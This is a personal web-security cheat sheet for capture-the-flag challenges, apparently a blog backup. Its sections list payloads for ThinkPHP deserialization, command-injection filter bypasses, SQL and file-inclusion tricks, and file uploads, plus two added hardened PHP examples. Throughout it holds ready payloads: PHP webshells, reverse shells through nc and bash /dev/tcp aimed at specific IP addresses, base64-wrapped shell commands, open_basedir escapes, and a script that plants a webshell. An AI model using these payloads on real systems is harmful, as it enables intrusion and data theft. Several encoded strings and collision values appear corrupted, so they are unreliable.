
Miscellaneous web notes (backup only)

2025-07-27 20:09:24

Contents

thinkphp6
Python decompilation
Web challenges
SSI injection
RCE
Character-length limits
7-character length
Bypasses when a particular letter is banned
ping challenges
Without digits or letters
Privilege-escalation challenges
Upload challenges:
Character bypasses
ool injection
SQL injection
Updating a table (UPDATE)
Injection 1:
HANDLER injection
Boolean-based blind injection
Special methods
Testing the column count
Stacked queries
Common bypasses
Flask challenges
Flask PIN calculation
Flask worked example
git challenges
Java challenges
JWT challenges
XXE challenges
SSRF challenges
file:// protocol
dict:// protocol
gopher:// protocol
Attacking MySQL without a password
MySQL arbitrary file read vulnerability
Writing a webshell
UNION-based query: #
Non-UNION query #
MySQL root privilege escalation
Attacking Redis
Redis master-slave replication
dict:// protocol, step by step:
http/s protocol: probing for live internal hosts
SSTI challenges
Twig templates
Smarty
Jinja
Sandbox escape
Character-length limits
The globals() function
Bytes instead of chars
Bypass methods
_posixsubprocess bypass
Multiple inputs
Single input
Random numbers
Output-stream redirection
XSS topics
Filtering img
Filtering script
Node.js challenges
1. Exploitation inside eval
Concatenation issues in JS:
3. Bypassing length limits via an array exception
Prototype pollution
Plain-variable equality bypass
Upgrading to an RCE bypass
Nested functions
EJS template RCE
PEAR include
Attacking php-rfm
Function usage
Illegal parameter names
Python usage
pickle deserialization challenges
PHP challenges
Notes:
PEAR include
Method 1: remote file download (download a remote webshell locally)
Method 2: generate a config file, passing our malicious PHP code through a config option
Method 3: writing a config file
Function summary
basename()
parse_url
file_get_contents()
file_put_contents()
getip()
include()
intval
is_number()
pathinfo()
toLowerCase
toUpperCase
array_search
call_user_func
putenv
parse_str()
strpos()
escapeshellcmd
escapeshellarg() escapeshellcmd()
exit()
Data()
create_function()
Yaml.load()
$_REQUEST
$_SERVER['QUERY_STRING']
toUpperCase()
toLowerCase():
fastcgi_pass
Deserialization challenges:
Character escape
__destruct triggering
Character-filter bypass: function, method and class names are case-insensitive
Bypassing throw new Exception: force GC collection so __destruct() runs
FastAPI
Combined worked examples
Common problems
SRC bug hunting:
Lookup platforms:
SQL vulnerabilities:


.so compilation

gcc -o hook.so -fPIC -shared -ldl -D_GNU_SOURCE

Reference: ThinkPHP vulnerability analysis and summary · Drunkmars's Blog

thinkphp6

PoC

<?php
/**
 * Created by PhpStorm.
 * User: wh1tP1g
 */
namespace think\model\concern {
    trait Conversion { protected $visible; }
    trait RelationShip { private $relation; }
    trait Attribute { private $withAttr; private $data; protected $type; }
    trait ModelEvent { protected $withEvent; }
}

namespace think {
    abstract class Model {
        use model\concern\RelationShip;
        use model\concern\Conversion;
        use model\concern\Attribute;
        use model\concern\ModelEvent;
        private $lazySave;
        private $exists;
        private $force;
        protected $connection;
        protected $suffix;

        function __construct($obj) {
            if ($obj == null) {
                $this->data     = array('wh1tp1g' => 'whoami');
                $this->relation = array('wh1tp1g' => []);
                $this->visible  = array('wh1tp1g' => []);
                $this->withAttr = array('wh1tp1g' => 'system');
            } else {
                $this->lazySave   = true;
                $this->withEvent  = false;
                $this->exists     = true;
                $this->force      = true;
                $this->data       = array('wh1tp1g' => []);
                $this->connection = 'mysql';
                $this->suffix     = $obj;
            }
        }
    }
}

namespace think\model {
    class Pivot extends \think\Model {
        function __construct($obj) {
            parent::__construct($obj);
        }
    }
}

namespace {
    $pivot1 = new \think\model\Pivot(null);
    $pivot2 = new \think\model\Pivot($pivot1);
    echo base64_encode(serialize($pivot2));
}

POST /user/upload/upload HTTP/1.1
Host: 8180dbac-b11b-41d5-a2cd-4a04a2797e0.
Cookie: PHPSESSID=7901b5229557c94bad46e16af2a728
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close

------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg

JFIF
<?php phpinfo();?>

------WebKitFormBoundaryrhx2kYAMYDqoTThz--

Python decompilation

uncompyle6 ../pyc/pyc > ../pyc/utils.py

Web challenges

Common tricks:

1. Bypass with ; & | || %0a %0d
2. For file reads, think of PHP stream wrappers (pseudo-protocols)
3. For file downloads, think of arbitrary file reads via directory traversal

The three strings below, after URL decoding, have identical md5() values:

$s1 = %af%1%76%70%82%a0%a6%58%cb%e%2%8%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%1%d%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c%8f%9%e%52%7%7%5%a0%5f%69%ef%c%b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%6%95%da%ee%1%bc%fb%7e%a%59%45%ef%25%67%c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%7%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%1%05%d1%15%7d%c4%5e%bc%0b%0f%21%2%a4%96%7c%17%12%d1%2b%b%10%b7%7%60%68%d7%cb%5%5a%54%97%08%0d%54%78%49%d0%9%c%b%fd%1f%0b%5%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%c%85%97%1e%f6%8%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%5%4f%0a%5c%4%d%7%a5%98%f7%66%72%aa%4%e%bd%a2%cd%62%fd%69%1d%4%0%57%52%ab%41%b1%91%65%f2%0%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%9%40%1a%1%d1%09%c5%e0%f7%87%5f%48%e7%d7%b%62%04%a7%c4%cb%fd%f4%ff%cf%b%74%28%1c%96%8e%09%7%a%9b%a6%2f%ed%b7%99%d5%b9%05%9%95%ab

$s2 = %af%1%76%70%82%a0%a6%58%cb%e%2%8%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%1%d%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c%8f%9%e%52%7%7%5%a0%5f%69%ef%c%b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%6%95%da%ee%1%bc%fb%7e%a%59%45%ef%25%67%c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%7%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%1%05%d1%15%7d%c4%5e%bc%0b%0f%21%2%a4%96%7c%17%12%d1%2b%b%10%b7%7%60%68%d7%cb%5%5a%54%97%08%0d%54%78%49%d0%9%c%b%fd%1f%0b%5%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a%65%55%5d%d5%76%55%57%46%6c%89%c9%5f%b2%c%85%97%1e%f6%8%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%5%4f%0a%5c%4%d%f%a5%98%f7%66%72%aa%4%e%bd%a2%cd%62%fd%e9%1d%4%0%57%52%ab%41%b1%91%65%f2%0%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%1%40%1a%1%d1%09%c5%e0%f7%87%5f%48%e7%d7%b%62%04%a7%c4%cb%fd%f4%ff%cf%b%74%a8%1b%96%8e%09%7%a%9b%a6%2f%ed%b7%99%d5%9%05%9%95%ab

$s = %af%1%76%70%82%a0%a6%58%cb%e%2%8%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%1%d%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c%8f%9%e%52%7%7%5%a0%5f%69%ef%c%b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%6%95%da%ee%1%bc%fb%7e%a%59%45%ef%25%67%c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%7%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%1%05%d1%15%7d%c4%5e%bc%0b%0f%21%2%a4%16%7c%17%12%d1%2b%b%10%b7%7%60%68%d7%cb%5%5a%54%97%08%0d%54%78%49%d0%9%c%%fd%1f%0b%5%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%c%85%97%1e%f6%8%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%5%4f%0a%5c%4%d%7%a5%98%f7%66%72%aa%4%e%bd%a2%cd%62%fd%69%1d%4%0%57%52%ab%41%b1%91%65%f2%0%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%9%40%1a%1%d1%09%c5%e0%f7%87%5f%48%e7%d7%b%62%04%a7%c4%cb%fd%f4%ff%cf%b%74%28%1c%96%8e%09%7%a%9b%a6%2f%ed%b7%99%d5%b9%05%9%95%ab

Octal bypass: 010574

A leading 0 marks the number as octal; both spellings work.

Hexadecimal: 0x

In a weak comparison, 4476e12 is scientific notation (4476 × 10^12), whereas intval() stops reading at the first letter and returns 4476, so the check is bypassed. Very neat.

php://filter/read=string.rot13/newstar/resource=flag.php

Reading via PHP wrappers

The first time vim exits abnormally it leaves a swap file named .index.php.swp; the next abnormal exit produces .index.php.swo; the third produces .index.php.swn.

XFF is controllable.

Flask may have Jinja2 template injection; PHP may have Twig template injection.

Local login (headers that applications mistake for the client address)

X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded: 127.0.0.1
X-Requested-With: 127.0.0.1
X-Forwarded-Proto: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-remote-IP: 127.0.0.1
X-remote-addr: 127.0.0.1
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
Ali-CDN-Real-IP: 127.0.0.1
Cdn-Src-Ip: 127.0.0.1
Cdn-Real-Ip: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
Fastly-Client-Ip: 127.0.0.1
True-Client-Ip: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

Where the request came from: Referer
Server IP: Via
Mailbox: From
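Why the header list above defeats "local only" checks, and what the check should look like instead, as an added example that is not part of the original notes: a naive client-IP lookup that believes any of those headers, beside one that only honours X-Forwarded-For when the TCP peer is a known proxy. The proxy address in TRUSTED_PROXIES and the two request arrays are constructed for the demonstration.

```php
<?php
// Added example, not from the original notes. Assumption: the application sits
// behind a single reverse proxy at 10.0.0.5 that appends the real client address
// to X-Forwarded-For. Everything below is constructed for the demonstration.

const TRUSTED_PROXIES = ['10.0.0.5'];

// Naive lookup, as found in many "local access only" checks: whichever of the
// headers from the list above is present wins, and the requester sets all of them.
function client_ip_naive(array $server): string
{
    foreach (['HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', 'HTTP_CLIENT_IP'] as $header) {
        if (!empty($server[$header])) {
            return trim(explode(',', $server[$header])[0]);
        }
    }
    return $server['REMOTE_ADDR'];
}

// Hardened lookup: REMOTE_ADDR is the TCP peer and cannot be changed by a header.
// X-Forwarded-For is consulted only when that peer is our own proxy, and then the
// entry the proxy appended (the last one) is used, not the first entry, which the
// client may have written itself.
function client_ip_safe(array $server): string
{
    $peer = $server['REMOTE_ADDR'];
    if (!in_array($peer, TRUSTED_PROXIES, true)) {
        return $peer;
    }
    $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    $candidate = end($chain);
    return filter_var($candidate, FILTER_VALIDATE_IP) !== false ? $candidate : $peer;
}

function is_loopback(string $ip): bool
{
    return $ip === '127.0.0.1' || $ip === '::1';
}

// Constructed request 1: an outside host sends the spoofed header directly.
$spoofed = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1'];
// Constructed request 2: same client, but the request arrived through our proxy,
// which appended the real source address after whatever the client sent.
$via_proxy = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 203.0.113.7'];

foreach (['direct' => $spoofed, 'via proxy' => $via_proxy] as $label => $request) {
    printf("%-9s naive=%s (loopback=%s) | safe=%s (loopback=%s)\n",
        $label,
        client_ip_naive($request), var_export(is_loopback(client_ip_naive($request)), true),
        client_ip_safe($request), var_export(is_loopback(client_ip_safe($request)), true));
}
```

Run it with the php CLI. The naive lookup classifies both constructed requests as loopback because it reads the client-supplied value first; the safe lookup never does, since a direct connection is judged by REMOTE_ADDR alone and a proxied one by the address the trusted proxy appended. Where possible, do this in the proxy itself (nginx's set_real_ip_from and real_ip_header from the realip module) rather than in application code, so that only one component decides what the client address is.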

$this->code==0x6d (in a weak comparison the decimal number also works)

If system() is blocked, shell_exec() can be used instead.

if (md5($_POST['a']) === md5($_POST['b'])) — array bypass

ls /|tee xxx also writes to a file; then open it with nl.

ctfshow::getflag calls the method directly

ctfshow[0]=ctfshow&ctfshow[1]=getFlag

If the colon is filtered, try an array: the first element is the class, the second the method name.

call_user_func(array($classname, 'say_hello'));

?1=session_start
?1=error_reporting
?1=json_last_error

Functions that return a truthy value, to bypass a == weak comparison.

?1=spl_autoload_extensions yields ".inc,.php" (shell file extensions)

Memory amplification via string replacement: exceeding PHP's default memory limit of 256M makes the variable definition fail.

str_replace

Already obtained the flag and the challenge still works normally, which means... the logs can be read.

Config: /etc/nginx/
Access log: /var/log/nginx/access.log
file:///etc/nginx/conf.d/
?page=/var/log/nginx/access.log ?page=/var/log/nginx/error.log ?page=/etc/nginx/

Depends on the process; one approach is to read /proc/self/maps.

MD5 topic

if ($sha1_1 != $sha1_2 && sha1($sha1_1) === sha1($sha1_2))

Array bypass

if ($a != $b && md5($a) == md5($b))

a=s1885207154a, b=s1836677006a

if ($a != $b && md5($a) == md5(md5($b)))

a=s1885207154a, b=V5VDSHva7fjyJoJIQl

if (($this->a !== $this->b) && (md5($this->a) === md5($this->b)) && (sha1($this->a) === sha1($this->b)))

a=1, b='1';

if ((string)$_GET['a'] !== (string)$_GET['b'] && md5($_GET['a']) === md5($_GET['b'])) {

s1=%4d%c9%68%ff%0e%e%5c%20%95%72%d4%77%7b%72%15%87%d%6f%a7%b2%1b%dc%56%b7%4a%d%c0%78%e%7b%95%18%af%bf%a2%00%a8%28%4b%f%6e%8e%4b%55%b%5f%42%75%9%d8%49%67%6d%a0%d1%55%5d%8%60%fb%5f%07%fe%a2

&s2=%4d%c9%68%ff%0e%e%5c%20%95%72%d4%77%7b%72%15%87%d%6f%a7%b2%1b%dc%56%b7%4a%d%c0%78%e%7b%95%18%af%bf%a2%02%a8%28%4b%f%6e%8e%4b%55%b%5f%42%75%9%d8%49%67%6d%a0%d1%d5%5d%8%60%fb%5f%07%fe%a2

$md5 == md5(md5($md5))

0e1138100474

$a == md5($a)

0e215962017

md5('240610708') == md5('QNKCDZO')

Raw digest contains a single quote ':

ffifdyop

e58

461168605257674264

Add 1

1e<202 1e71>202

%0a bypasses the # comment character
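The three comparison mistakes the payloads above rely on, each beside a check that resists them, as an added example that is not part of the original notes. It uses the magic-hash pairs listed above as input; the function names and the choice of SHA-256 in the hardened version are mine.

```php
<?php
// Added example, not from the original notes. Runs on PHP 7.x and 8.x.

// 1. Loose ==: a hex digest that starts with "0e" followed only by digits is a
//    numeric string, and PHP compares two numeric strings as numbers (0e... == 0).
function compare_loose(string $a, string $b): bool
{
    return md5($a) == md5($b);
}

// 2. Array bypass: with a=[] and b=[1], $a != $b holds, and on PHP 7 md5() of an
//    array returns null (with a warning), so md5($a) === md5($b) is null === null.
//    PHP 8 throws a TypeError instead, which this wrapper reports as "no match".
function compare_strict_untyped($a, $b): bool
{
    try {
        return $a != $b && @md5($a) === @md5($b);
    } catch (\TypeError $e) {
        return false;
    }
}

// Hardened: insist on strings, then compare digests with hash_equals(), which is
// a byte-for-byte comparison (no numeric juggling) in constant time. SHA-256 is
// used because genuine MD5 collisions (the s1/s2 pair above) defeat any MD5 check.
function compare_safe($a, $b): bool
{
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return hash_equals(hash('sha256', $a), hash('sha256', $b));
}

// Magic-hash pairs from the notes above: both MD5 digests begin with 0e.
$pairs = [
    ['240610708', 'QNKCDZO'],
    ['s1885207154a', 's1836677006a'],
];
foreach ($pairs as [$a, $b]) {
    printf("%-14s %-14s loose=%s safe=%s\n", $a, $b,
        var_export(compare_loose($a, $b), true), var_export(compare_safe($a, $b), true));
}
printf("arrays:        untyped=%s safe=%s\n",
    var_export(compare_strict_untyped([], [1]), true), var_export(compare_safe([], [1]), true));
```

The type check matters as much as hash_equals(): hash_equals() itself throws on non-string arguments, so rejecting arrays up front turns the array bypass into a clean "false" instead of an error page. Declaring the parameters as string would do the same, but only when strict_types is on; with coercive typing an array still raises a TypeError.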

SSI injection (written "ssl" in the original heading)

Telltale: .shtml files

<!--#exec cmd="ls -al"-->

RCE

4-, 5- and 7-character bypasses

Character-length limits

7-character length

Trick: nl /*>1

Split the payload across several commands

echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php

which writes:

<?php eval($_GET[1]);

Script that sends the split commands one line at a time (the name of the command file was missing from the original and is a placeholder here):

import requests
import time

url = "http://show/api/tools.php"
with open("commands.txt", "r") as f:  # placeholder file name: one command per line
    for i in f:
        data = {"cmd": i.strip()}
        r = requests.post(url=url, data=data)
        time.sleep(1)  # pacing between requests
        print()

test = requests.get("http://show/api/1.php")
if test.status_code == 200:
    print("you've got it!")

4-character bypass

cat /flag   base64: PD9waHAgcGhwaW5mbygpOw==  (decodes to <?php phpinfo();)
Construct:
echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==|base64 -d>1.php  (decodes to <?php eval($_POST[1]);)

Bypasses when a particular letter is banned

1. Backslash escape: cat fla\g.php
2. Two single quotes as a separator: cat fl''ag.php
3. base64 encoding: echo Y2F0IGZsYWcucGhw | base64 -d | sh
4. Hex encoding: echo 63617420666c61672e706870 | xxd -r -p | bash
5. Glob wildcards: cat f[k-m]ag.php, cat f[l]ag.php
6. ? and *
7. cat f{k..m}ag.php
8. Build the name from a variable: a=g.php; cat fla$a
9. Inline execution: cat `echo 666c61672e706870 | xxd -r -p`, or cat $(echo 666c61672e706870 | xxd -r -p), or echo 666c61672e706870 | xxd -r -p | xargs cat
10. Specified characters

Concatenated execution

echo YmFzaCAtYyAnYmFzaCAtaSAJiAvZGV2LRjcC81aTc4MTk2MAyLnlpYAuZnVuLzU4MjY1IDAJjEn | base64 -d | bash

if (preg_match('/f|l|a|g/', $a))
only filters the command argument

function=file_get_contents&cmd=http://47.99.125.16/.php
all filtered

function=strtolower&cmd=show_source(chr(47).chr(102).chr(49).chr(97).chr(103));

More: `php -r 'echo chr(102).chr(49).chr(97).chr(103);'`

ls / |script   writes the output
eval function

system() usually echoes its output; with backticks, echo is usually needed to print it.

No-echo problems:

python -m http.server 80    start a listener
php -S localhost:8000       start PHP on Linux

nc -lp 99

nc 47.99.125.16 89 -e /bin/bash
nc 47.99.125.16 89 -e /bin/sh

echo YmFzaCAtYyAnYmFzaCAtaSAJiAvZGV2LRjcC80y45OS4xMjUuMTYvMzM4OSAgMD4mMSc= | base64 -d | bash
a';CALL SHELLEXEC('bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSAJiAvZGV2LRjcC80y45OS4xMjUuMTYvMzM4OSAgMD4mMSc=}|{base64,-d}|{bash,-i}');--

echo bash -c 'bash -i >& /dev/tcp/49.22.224.59/89 0>&1' | base64 -d | bash

bash -c 'exec bash -i &>/dev/tcp/49.22.224.59/89 <&1'
Reverse shell

. can be replaced by 。

curl 192.168.74.129/12          fetch
curl -T /tmp/Syclover           upload data
     -o shell.php               download to a file
curl https://haxx.in/files/ -o

curl -t 192.169.1.1 /flag       (Geek Challenge 2023 web write-ups, CSDN blog)

?url=http://ip:17/ -F file=@/flag

Check which process holds a port:

lsof -i :<port>

ping challenges

Colon filtered: use %0a instead

$(printf "\154\163") runs ls — bypasses a backtick filter

Approach:

Blacklist bypass for RCE with hex encoding: aaa=hex2bin('73797374656d')('uniq /f*');

Log substitution

/var/log/nginx/access.log

Learned the file-reading trick sed p /e-g* ; which is equivalent to cat /flag

nl -> uniq

Space: ${IFS}

# mv can move flag.php to another file, which is then fetched for the flag: ?c=mv${IFS}fla?.php${IFS}

$(()) is 0

$((~$(()))) is -1

$(($((~$(())))$((~$(()))))) is -2

Reading files

c=include$_POST[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

data://text/plain;base64,PD9waHAgclzdGVtKCdjYXQgZmxhZy5waHAnKTs=

Log-file inclusion, then use include

c=var_export(scandir('/'));exit();

Close eval with ?>

c=highlight_file('/flag.php'); c=include('/'); c=require('/'); c=include_once('/'); c=require_once('/');

When the file has already been loaded with include, a later require skips it; the following is used to bypass that:

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

--require skipped

c=$a=opendir('/');while(($file = readdir($a)) != false){echo $file.' ';}

c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString().' ');} # list the files in the root directory

c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->getFilename().' ');}

Reading root-directory files

1. Reading the source shows that the final output step replaces every digit and letter with "?"; exit(); cuts off the code that follows.

2. Scan the directory:

c=$a=opendir('/');while(($file=readdir($a)) != false) {echo $file.' ';}exit();

passthru("ls /");

Parameterless reads

// The exp script below is from the official write-up

/?exp=eval(file_put_contents('1.php',base64_decode($_POST['a'])));

POST:

a=PD9waHAKaGlnaGxpZ2h0X2ZpbGUoX19GSUxFX18pOwojIFBvcnQgc2hbgpmbIoJGk9MDskaTw2TUzTskaSsrKSB7CiAgJHQ9cRyZWFtXvY2tldF9zZXJ2ZXIoInRjcDovLzAuMC4wLjA6Ii4kaSwkZWUsJGVlMik7CiAgaWYoJGVlMiA9PT0gIkFkZHJlcMgYWxyZWFkeSBpbiB1c2UiKSB7CiAgICB2YXJfZHVtcCgkaSk7CiAgfQp9Cg==

Scanning usable ports

var_dump(get_cfg_var('disable_functions'));

var_dump(get_cfg_var('open_basedir'));

var_dump(ini_get_all()); // related configuration

get_loaded_extensions() // list all compiled and loaded modules

highlight_file(array_rand(array_flip(scandir(getcwd())))); // list and read files in the current directory

print_r(scandir(dirname(getcwd()))); // list the parent directory

print_r(scandir(next(scandir(getcwd())))); // list the parent directory

show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd()))))))); // read a file in the parent directory

show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd()))))))))))); // read a file in the parent directory

show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion()))))))))))))))); // read a file in the parent directory

show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv())))))))))))); // needs brute-forcing, otherwise refreshing by hand takes ages; if the file is first or second from either end it can be hit directly

// list and read root-directory files

print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));

show_source(array_rand(array_flip(scandir(chr(ord(strrev(crypt(serialize(array())))))))));

$a->lover=mkdir('a');chdir('a');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('.'));

$a->lover=mkdir('a');chdir('a');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('.'));readfile('f1ger');

echo file_get_contents('/ctfshowflag');

// list and read root-directory files

=> obtained path /var/html

?code=print_r(getcwd());

=> nothing usable in that directory

?code=print_r(scandir(getcwd()))

=> the parent directory is Array ( [0] => . [1] => .. [2] => flag_phpbyp4ss [3] => html )

?code=print_r(scandir(dirname(getcwd())))

=> found the flag file; read it

?code=readfile(next(array_reverse(scandir(dirname(getcwd())))))

=> error: the file flag_phpbyp4ss does not exist; change the working directory

?code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))))

Take the last element of the array

show_source(end(scandir(getcwd())));

get_defined_vars(void): array — returns an array of all defined variables

?code=eval(end(current(get_defined_vars())));&b=phpinfo();

Without digits or letters

$=[];$=@$;$=$[ ! == @ ];$___=$;$=$_;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$_.=$;$_.=$;$=$;$;$;$;$;$_.=$;$__=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$_.=$;$=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$_.=$;$__= ;$=$_;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$.=$;$=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$.=$;$=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$.=$;$=$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$__.=$__;$=$$;$__($[_]);

Older webshells often use assert(eval($_POST['test']))

?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%9%D7%DB%A0%AF%B0%AC%AB%A4%DD%8B%9A%8C%8B%DD%A2%D6%D6);

Bypass disable_functions with AntSword

Privilege-escalation challenges

find / -perm -u=s -type f 2>/dev/null    // list SUID binaries

find / -perm -4000 2>/dev/null           // this also works

A timed trigger may mean there is a cron job: cat /etc/crontab

lsb_release -a   list Linux distribution and version information
nginx -v         nginx version

pkexec --version

Check versions

grep -rl "SS**" /path/to/search   search for specific content

find / -type f -exec grep -l "SSCTF{" {} \;

auto_prepend_file phpinfo

Multiple variable overwrite via extract(): try session_id=session_id

${} executes code

eval
assert
preg_replace
create_function()
array_map()
call_user_func()/call_user_func_array()
array_filter()
usort(), uasort()

Upload challenges:

Multi-file inclusion

POST / HTTP/1.1
Content-Type: multipart/form-data;boundary=--------------------------55split
User-Agent: Firefox
Accept: */*
Host: 192.168.1.11
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 62

----------------------------55split
Content-Disposition: form-data; name=""; filename="1.py"
Content-Type: application/octet-stream

HWO
----------------------------55split
Content-Disposition: form-data; name="flag"
Content-Type: application/octet-stream

php://filter/read=convert.base64-encode/resource=flag.php
----------------------------55split--

One-liner webshell:

<script language="php"></script>

Logic flaws, content-detection bypass

A file header is a block of data at the start of a file with a specific role; it usually marks the file type, e.g. gif89a or gif87a for GIF, \x89PNG\x0d\x0a for PNG, and so on.

The PHP interpreter parses: php, php3, php4, php5, php7, phtml, pht, phs, shtml, pwml. In this challenge everything except the last two was blacklisted by the WAF.

$file=1.php.1   // Apache 2.x parsing flaw; a trailing /. is not parsed

$file=1.pwml    // PHP interpreter bypass

con=<?php @eval($_POST[cmd]);?>&file=test.php/   a recursive directory truncates the name

PHP features:

<script language="php">echo 123;</script>   no question mark needed

<% echo 123;%>   # requires the config option asp_tags=on, and only works below PHP 7.0

